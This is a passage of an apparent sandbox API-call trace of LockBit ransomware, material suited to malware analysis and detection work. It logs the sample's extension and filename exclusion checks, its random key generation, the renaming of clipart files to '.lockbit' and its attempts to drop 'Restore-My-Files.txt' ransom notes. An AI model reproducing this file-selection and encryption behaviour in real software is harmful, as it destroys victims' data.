(lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200521.WMF") returned 1 [0151.963] lstrcmpiW (lpString1="ntldr", lpString2="J0200521.WMF") returned 1 [0151.963] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200521.WMF") returned 1 [0151.963] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200521.WMF") returned -1 [0151.963] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200521.WMF") returned -1 [0151.963] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200521.WMF") returned 1 [0151.963] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200521.WMF") returned -1 [0151.963] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.963] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF") returned=".WMF" [0151.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.963] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.963] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.964] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.964] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF.lockbit") returned 72 [0151.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200521.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0151.965] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.965] malloc (_Size=0x40068) returned 0x3f70048 [0151.966] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=10046) returned 1 [0151.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0151.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0151.967] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0151.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.971] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.971] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.972] free (_Block=0x1fa2ed8) [0151.972] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200521.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.972] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.972] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.972] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66057f70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xf36, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200611.WMF", cAlternateFileName="")) returned 1 [0151.972] lstrcmpiW (lpString1=".", lpString2="J0200611.WMF") returned -1 [0151.972] lstrcmpiW (lpString1="..", lpString2="J0200611.WMF") returned -1 [0151.972] PathFindExtensionW (pszPath="J0200611.WMF") returned=".WMF" [0151.972] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.972] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.973] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.973] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200611.WMF") returned 1 [0151.974] lstrcmpiW (lpString1="ntldr", lpString2="J0200611.WMF") returned 1 [0151.974] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200611.WMF") returned 1 [0151.974] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200611.WMF") returned -1 [0151.974] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200611.WMF") returned -1 [0151.974] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200611.WMF") returned 1 [0151.974] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200611.WMF") returned -1 [0151.974] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.974] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF") returned=".WMF" [0151.974] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.974] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.974] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.975] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.976] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.976] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.976] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.976] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF.lockbit") returned 72 [0151.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200611.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0151.977] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.977] malloc (_Size=0x40068) returned 0x3fb00b8 [0151.978] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=3894) returned 1 [0151.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0151.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0151.979] ReadFile (in: hFile=0x2a4, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0151.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.986] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.986] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.988] free (_Block=0x1fa2ed8) [0151.988] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200611.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.988] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.988] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66057f70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa50e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0202045.JPG", cAlternateFileName="")) returned 1 [0151.988] lstrcmpiW (lpString1=".", lpString2="J0202045.JPG") returned -1 [0151.988] lstrcmpiW (lpString1="..", lpString2="J0202045.JPG") returned -1 [0151.988] PathFindExtensionW (pszPath="J0202045.JPG") returned=".JPG" [0151.988] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0151.988] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0151.988] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0151.988] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0151.988] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0151.988] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0151.989] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0151.989] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0151.990] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0151.990] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0202045.JPG") returned 1 [0151.990] lstrcmpiW (lpString1="ntldr", lpString2="J0202045.JPG") returned 1 [0151.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0202045.JPG") returned 1 [0151.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0202045.JPG") returned -1 [0151.990] lstrcmpiW (lpString1="autorun.inf", lpString2="J0202045.JPG") returned -1 [0151.990] lstrcmpiW (lpString1="thumbs.db", lpString2="J0202045.JPG") returned 1 [0151.990] lstrcmpiW (lpString1="iconcache.db", lpString2="J0202045.JPG") returned -1 [0151.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG") returned=".JPG" [0151.990] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0151.990] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0151.990] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0151.990] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0151.990] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0151.991] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0151.991] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG.lockbit") returned 72 [0151.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0202045.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0151.992] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.992] malloc (_Size=0x40068) returned 0x3d70450 [0151.992] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=42254) returned 1 [0151.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0151.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0151.993] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.000] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.000] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.001] free (_Block=0x1fa2ed8) [0152.001] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.001] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.001] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.001] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b62300, ftCreationTime.dwHighDateTime=0x1be560f, 